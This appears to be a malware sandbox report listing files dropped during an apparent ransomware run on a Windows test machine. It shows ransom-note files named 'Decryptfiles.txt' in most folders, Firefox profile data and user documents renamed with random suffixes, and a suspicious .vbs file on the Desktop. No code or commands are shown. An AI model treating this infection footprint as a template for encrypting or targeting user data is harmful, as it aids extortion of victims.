C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1.hmSR (copy)
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json
|
zlib compressed data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal.jKAH
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lock.nSoU
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal.OceF
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4
|
SysEx File -
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.BYlE
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.IfAC
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.MWJn
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.MyAb
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.lNRa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.tsPL
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal.WNUc
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.Hcif
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\_curlrc.KgUE
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Contacts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EEGWXUHVUG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ.jpg
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ.jpg.mkTG (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EOWRVPQCCS\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\JDDHMPCDUJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA.docx
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg.xSqw (copy)
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EEGWXUHVUG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EOWRVPQCCS\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\JDDHMPCDUJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.jpg
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\GIGIYTFFYT.mp3
|
OpenPGP Secret Key Version 2
|
dropped
|
||
C:\Users\user\Downloads\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
